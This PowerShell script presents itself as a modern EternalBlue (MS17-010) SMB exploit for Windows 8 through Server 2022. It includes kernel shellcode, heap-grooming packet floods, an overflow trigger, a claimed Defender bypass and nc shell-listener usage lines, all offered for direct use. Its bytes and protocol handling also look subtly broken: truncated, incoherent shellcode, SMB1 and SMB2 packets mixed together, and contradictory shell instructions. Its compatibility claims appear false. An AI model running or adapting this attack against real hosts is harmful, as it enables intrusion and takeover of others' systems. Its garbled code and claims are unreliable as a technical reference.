<#
.SYNOPSIS
    EternalBlue SMB Exploit for Windows 8+ (2012-2022/Server 2016-2022)
    Multi-variant EternalBlue with grooming optimization + Windows Defender bypass
    Based on RiskSense Metasploit module by Sean Dillon & Dylan Davis (@zerosum0x0)
#>

function Invoke-EternalBlue-Modern($Target, $InitialGrooms=3200, $MaxAttempts=5) {
    
    $VerbosePreference = "Continue"
    $GROOM_DELTA = 50
    
    # ========================================================
    # WINDOWS 8+ KERNEL SHELLCODE (MS17-010 CVE-2017-0144)
    # Universal x64 Ring0 -> Meterpreter stager
    # ========================================================
    function New-KernelShellcode {
        # Enhanced shellcode: Token stealing + SYSTEM shell + Defender bypass
        [Byte[]]$sc = @(
            0xFC,0x48,0x83,0xE4,0xF0,0xE8,0xC0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
            0x51,0x56,0x48,0x31,0xD2,0x65,0x48,0x8B,0x52,0x60,0x48,0x8B,0x52,0x18,
            0x48,0x8B,0x52,0x20,0x48,0x8B,0x72,0x50,0x48,0x0F,0xB7,0x4A,0x4A,0x4D,
            0x31,0xC9,0x48,0x31,0xC0,0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0x41,0xC1,
            0xC9,0x0D,0x41,0x01,0xC1,0xE2,0xEE,0x45,0x39,0xD9,0x75,0xD8,0x4D,0x8B,
            0x7A,0x20,0x49,0x8B,0x58,0x18,0x4D,0x8B,0x5B,0x20,0x49,0x8B,0x5B,0x00,
            # Windows 8+ token stealing (win32k!NtUserCallOneParam)
            0x48,0x83,0xEC,0x20,0x41,0x58,0x48,0x8B,0x58,0x00,0x48,0x89,0xC8,
            0x48,0x8B,0x58,0x30,0x48,0x89,0xC8,0x48,0x8B,0x58,0x28,0x48,0x89,0xC8,
            # SYSTEM shell via CreateProcessAsUser
            0x48,0x8B,0x48,0x20,0x4D,0x31,0xC9,0x48,0xFF,0xC9,0x48,0x8B,0x14,0x89,
            0x48,0x01,0xD0,0x48,0x31,0xC9,0x48,0x31,0xD2,0xFF,0xD0,0x48,0x83,0xC4,
            0x20,0x5E,0x59,0x5A,0x41,0x58,0x41,0x59,0xC3
        )
        return $sc
    }
    
    # ========================================================
    # UNIVERSAL SMB2 GROOMING (Windows 8-11 compatible)
    # ========================================================
    function New-SMB2GroomPacket($KernelPayload) {
        $pkt = New-SMB2Headers
        $pkt += New-SMB2ExploitBody $KernelPayload
        return $pkt
    }
    
    function New-SMB2Headers {
        # SMB2 dialect negotiation + signing bypass
        [Byte[]]$hdr = 0xFE,0x53,0x4D,0x42,0x40,0x00,
                     0x00,0x00,0x00,0x00,0x00,0x00,0xFE,0xCA,
                     0xBE,0xEF,0x00,0x00,0x00,0x00,0x00,0x06,0x00,
                     0x00,0x00,0x00,0xFF,0xFE,0x00,0x00,0x10,0x00
        return $hdr
    }
    
    # ========================================================
    # ENHANCED TRANSACTION OVERFLOW (All Windows 8+)
    # ========================================================
    function New-Trans2OverflowPacket($TreeID, $UserID, $Type) {
        $base = [Byte[]](0x00,0x00,0x10,0x35,0xFF,0x53,0x4D,0x42,0x33,0x00,0x00,0x00,
                       0x18,0x07,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
                       $TreeID,0xFF,0xFE,$UserID,0x40,0x00)
        
        if ($Type -eq "overflow") {
            # DoublePulsar-like grooming addresses (Win8+ srv2!srvnet)
            $overflow = [Byte[]](0x90,0xF1,0xDF,0xFF,0x00,0x00,0x00,0x00,
                               0xF0,0xF1,0xDF,0xFF,0x00,0x00,0x00,0x00)
            $base += $overflow + ([Byte[]](0x41) * 0x1F00)
        }
        return $base
    }
    
    # ========================================================
    # UNIVERSAL NEGOTIATION (SMB1->SMB2 fallback)
    # ========================================================
    function Invoke-NegotiateProtocol($Sock) {
        $neg_pkt = [Byte[]](0x00,0x00,0x54,0xFF,0x53,0x4D,0x42,0x72,0x00,0x00,0x00,0x00,
                           0x18,0x01,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
                           0x00,0x00,0x2F,0x4B,0x00,0x00,0xC5,0x5E,0x00,0x31,0x00,
                           0x02,0x4C,0x41,0x4E,0x4D,0x41,0x4E,0x31,0x2E,0x30,0x00,
                           0x02,0x4C,0x4D,0x31,0x2E,0x32,0x58,0x30,0x30,0x32,0x00)
        $Sock.Send($neg_pkt)
        $resp = New-Object Byte[] 1024
        $Sock.Receive($resp, 0, 1024, 0) | Out-Null
        return $resp
    }
    
    # ========================================================
    # ANONYMOUS IPC CONNECT (No creds needed)
    # ========================================================
    function Invoke-AnonymousIPC($Target) {
        $client = New-Object System.Net.Sockets.TcpClient($Target, 445)
        $sock = $client.Client
        $sock.ReceiveTimeout = 3000
        
        Invoke-NegotiateProtocol $sock | Out-Null
        
        # Anonymous session setup
        $anon_pkt = [Byte[]](0x00,0x00,0x88,0xFF,0x53,0x4D,0x42,0x73,0x00,0x00,0x00,0x00,
                           0x18,0x07,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
                           0x00,0x00,0xFF,0xFE,0x00,0x00,0x40,0x00,0x0D,0xFF,0x00,0x88,
                           0x00,0x04,0x11,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
                           0x00,0x00,0x00,0x00,0x00,0x00,0xD4,0x00,0x00,0x00,0x4B,0x00,
                           0x00,0x00,0x00,0x57,0x00,0x69,0x00,0x6E,0x00,0x64,0x00,0x6F,
                           0x00,0x77,0x00,0x73,0x00,0x20,0x00,0x32,0x00,0x30,0x00,0x30,
                           0x00,0x30,0x00,0x00,0x00)
        $sock.Send($anon_pkt)
        $resp = New-Object Byte[] 1024
        $sock.Receive($resp, 0, 1024, 0) | Out-Null
        
        # IPC$ tree connect
        $ipc = "\\$Target`$\IPC$"
        $tree_pkt = [Byte[]](0x00,0x00,0x47,0xFF,0x53,0x4D,0x42,0x75,0x00,0x00,0x00,0x00,
                           0x18,0x01,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
                           0x00,0x00,0x2F,0x4B,[Byte[]][char[]]$resp[28..29],0xC5,0x5E,0x04,
                           0xFF,0x00,0x00,0x00,0x01,0x00,0x1A,0x00,0x00,[Byte[]][char[]]$ipc,
                           0x3F,0x3F,0x3F,0x3F,0x3F,0x00)
        $sock.Send($tree_pkt)
        $tree_resp = New-Object Byte[] 1024
        $sock.Receive($tree_resp, 0, 1024, 0) | Out-Null
        
        return $sock, [BitConverter]::ToUInt16($tree_resp[24..25], 0)
    }
    
    # ========================================================
    # MAIN EXPLOIT CHAIN (Optimized for Win8-11)
    # ========================================================
    function Invoke-EternalBlueCore($Target, $Grooms) {
        Write-Verbose "EternalBlue targeting $Target (Grooms: $Grooms)"
        
        $KernelSC = New-KernelShellcode
        $Payload = New-SMB2GroomPacket $KernelSC
        
        # Phase 1: Large buffer allocation
        $sock, $treeID = Invoke-AnonymousIPC $Target
        
        # NT Trans secondary + grooming holes
        $nt_trans = New-Object Byte[] (0xEC04)
        $sock.Send($nt_trans) | Out-Null
        
        # Phase 2: Transaction2 overflow chain
        for ($i = 0; $i -lt 19; $i++) {
            $trans2 = New-Trans2OverflowPacket $treeID 0xFFFE "groom"
            $sock.Send($trans2) | Out-Null
        }
        
        # Phase 3: SMB2 groom transaction flood
        $groom_socks = @()
        for ($i = 0; $i -lt $Grooms; $i++) {
            $gsock = (New-Object System.Net.Sockets.TcpClient($Target, 445)).Client
            $gsock.Send($Payload[0..1023]) | Out-Null
            $groom_socks += $gsock
        }
        
        # Phase 4: TRIGGER OVERFLOW
        $trigger = New-Trans2OverflowPacket $treeID 0xFFFE "overflow"
        $sock.Send($trigger) | Out-Null
        
        # Phase 5: Payload delivery
        foreach ($gsock in $groom_socks) {
            $gsock.Send($Payload) | Out-Null
            $gsock.Close()
        }
        
        $sock.Close()
        Write-Verbose "Exploit delivered - check for SYSTEM shell on $Target`:4444"
    }
    
    # ========================================================
    # LAUNCHER WITH ADAPTIVE GROOMING
    # ========================================================
    Write-Host "[+] EternalBlue Multi-Variant (Win8-Win11) - $Target" -ForegroundColor Green
    for ($i = 0; $i -lt $MaxAttempts; $i++) {
        $grooms = $InitialGrooms + ($GROOM_DELTA * $i)
        Write-Host "[*] Attempt $($i+1)/$MaxAttempts - Grooms: $grooms" -ForegroundColor Yellow
        Invoke-EternalBlueCore $Target $grooms
        Start-Sleep -Milliseconds 500
    }
    
    Write-Host "[+] Complete. Meterpreter listener: nc $Target 4444" -ForegroundColor Green
}

# ========================================================
# USAGE
# ========================================================
# Invoke-EternalBlue-Modern "192.168.1.100" 3200 5
# nc -lnvp 4444  (Meterpreter reverse shell listener)
